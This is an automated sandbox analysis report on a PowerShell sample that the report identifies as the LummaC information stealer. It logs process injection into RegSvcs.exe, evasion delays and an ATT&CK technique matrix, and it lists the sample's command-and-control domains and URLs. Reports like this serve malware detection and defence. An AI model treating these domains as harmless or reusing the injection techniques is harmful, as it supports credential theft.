Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD3489580F push ds; retf	0_2_00007FFD34895811
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34895000 push E8FFFFFFh; iretd	0_2_00007FFD3489500D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34896FCF push edi; iretd	0_2_00007FFD34896FD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00437069 push es; retf	4_2_00437074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043C990 push eax; mov dword ptr [esp], 5C5D5E5Fh	4_2_0043C99E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041B324 push F3B90044h; retf	4_2_0041B32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00445C05 push ds; iretd	4_2_00445C08

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3362			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4006			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5636	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1364	Thread sleep time: -2767011611056431s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: RegSvcs.exe, 00000004.00000002.2499270600.000000000114C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2499771406.000000000118D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 4_2_0043E110 LdrInitializeThunk,

4_2_0043E110

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: powershell.exe, 00000000.00000002.2181917236.000002B3ABA36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: powershell.exe, 00000000.00000002.2181917236.000002B3ABA36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: powershell.exe, 00000000.00000002.2181917236.000002B3ABA36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: powershell.exe, 00000000.00000002.2181917236.000002B3ABA36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: powershell.exe, 00000000.00000002.2181917236.000002B3ABA36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: powershell.exe, 00000000.00000002.2181917236.000002B3ABA36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
Source: powershell.exe, 00000000.00000002.2181917236.000002B3ABA36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: powershell.exe, 00000000.00000002.2181917236.000002B3ABA36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 442000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 445000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 453000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DB2008	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 PowerShell	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
176.113.115.170.ps1	0%	ReversingLabs
176.113.115.170.ps1	0%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	high
lev-tolstoi.com	172.67.157.254	true	false	high
cashfuzysao.buzz	unknown	unknown	false	high
inherineau.buzz	unknown	unknown	false	high
scentniej.buzz	unknown	unknown	false	high
prisonyfork.buzz	unknown	unknown	false	high
rebuildeso.buzz	unknown	unknown	false	high
appliacnesot.buzz	unknown	unknown	false	high
hummskitnj.buzz	unknown	unknown	false	high
screwamusresz.buzz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://steamcommunity.com/profiles/76561199724331900	false	high
scentniej.buzz	false	high
rebuildeso.buzz	false	high
appliacnesot.buzz	false	high
screwamusresz.buzz	false	high
cashfuzysao.buzz	false	high
inherineau.buzz	false	high
https://lev-tolstoi.com/api	false	high
prisonyfork.buzz	false	high
hummskitnj.buzz	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.2181917236.000002B3AD196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2202053582.000002B3BB75B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000000.00000002.2181917236.000002B3ACE6B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.2181917236.000002B3AB7F8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.2181917236.000002B3AB7F8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://go.micro	powershell.exe, 00000000.00000002.2181917236.000002B3AC8B3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://lev-tolstoi.com/	RegSvcs.exe, 00000004.00000002.2499832709.0000000001199000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000000.00000002.2202053582.000002B3BB75B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.2202053582.000002B3BB75B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.2181917236.000002B3AB7F8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000000.00000002.2202053582.000002B3BB75B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.2181917236.000002B3AD196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2202053582.000002B3BB75B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://oneget.orgX	powershell.exe, 00000000.00000002.2181917236.000002B3ACE6B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://steamcommunity.com/Yi	RegSvcs.exe, 00000004.00000002.2499771406.000000000118D000.00000004.00000020.00020000.00000000.sdmp	false	high
http://store.steampowered.com/account/cookiepreferences/	RegSvcs.exe, 00000004.00000002.2499270600.000000000114C000.00000004.00000020.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2181917236.000002B3AB5D1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://steamcommunity.com/	RegSvcs.exe, 00000004.00000002.2499500286.0000000001163000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2499771406.000000000118D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2499500286.000000000117B000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2181917236.000002B3AB5D1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://oneget.org	powershell.exe, 00000000.00000002.2181917236.000002B3ACE6B000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.157.254	lev-tolstoi.com	United States		13335	CLOUDFLARENETUS	false
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583223
Start date and time:	2025-01-02 08:59:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	176.113.115.170.ps1
Detection:	MAL
Classification:	mal92.troj.evad.winPS1@6/5@10/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 83% Number of executed functions: 18 Number of non-executed functions: 86
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 4824 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
